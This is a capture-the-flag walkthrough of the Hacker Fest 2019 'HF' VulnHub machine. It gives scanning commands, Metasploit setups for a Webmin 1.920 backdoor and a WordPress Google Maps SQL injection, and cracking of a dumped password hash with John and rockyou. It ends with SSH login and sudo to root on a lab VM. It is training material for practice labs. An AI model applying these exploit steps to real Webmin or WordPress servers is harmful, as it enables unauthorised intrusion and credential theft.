The machine was part of my workshop for Hacker Fest 2019 at Prague. Difficulty level of this VM is very “very easy”. There are two paths for exploit it. There are no intentional rabbit holes. There is a “[retracted]” injection (exploit is part of MSF). Recovered credentials (username + hash) can be cracked by John and rockyou.txt wordlist. Low priv shell can be gained through MSF exploit or trying the credentials against “[retracted]”. Priv. esc. is simply done by “[retracted]”.
Url: HF VulnHub
Author: Martin Haller
Firstly, a netdiscover scan will reveal how the machine can be identified on the network:
netdiscover -i eth1
Then an nmap scan:
nmap -p- -A 192.168.56.112
The port scan reveals ports 21 (ftp), 22 (ssh) and 10000 which seems to be hosting Webmin. I will attempt to connect via FTP via Anonymous. This was an extremely easy way to gain access to all the wordpress websites files, however I will be exploring other methods which require more exploitation.
Some simple enumeration and an understanding of back end web apps will get you the right information.
Some research shows a Webmin 1.920 vulnerability. I use searchsploit to find these vulnerabilities. I am particularly interested in the Unauthenticated Remote Code Execution.
On metasploit console, we use the webmin exploit and fill out the necessary options as demonstrated below:
msfconsole use exploit/linux/http/webmin_backdoor show options set rhosts 192.168.56.112 set ssl true set lhost 192.168.56.101
The exploit is ready to go.
Another attack vector is the Wordpress site on port 80.
WPScan will be used to find any vulnerabilities and possible users on the website. Please note that you use a WPScan API Token from here to view the vulnerable data.
wpscan --url http://192.168.56.112/ -e vp,u
After some research, the Unauthenticated SQL Injection vulnerability seems like the best route to go down. There is a Metasploit module for this.
Something else to note is the username ‘webmaster’ found on the Wordpress site.
msfconsole use auxiliary/admin/http/wp_google_maps_sqli show options set RHOSTS 192.168.56.112
The exploit has been correctly set up. Run the exploit.
A hash value has been returned with the correct username that was found before on the WPScan results.
192.168.56.112:80 - Found webmaster $P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1 [email protected]
Let’s ask our friend John to crack it. Use rockyou.txt as the wordlist.
echo "$P$BsqOdiLTcye6AS1ofreys4GzRlRvSr1" > hash.txt john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
The password “kittykat1” has been returned.
Let’s try connect via ssh:
ssh [email protected] kittykat1
We are logged in as webmaster. Check the sudo privileges with the following command:
This user is basically already root so let’s just change to root shell with the following:
And we are root.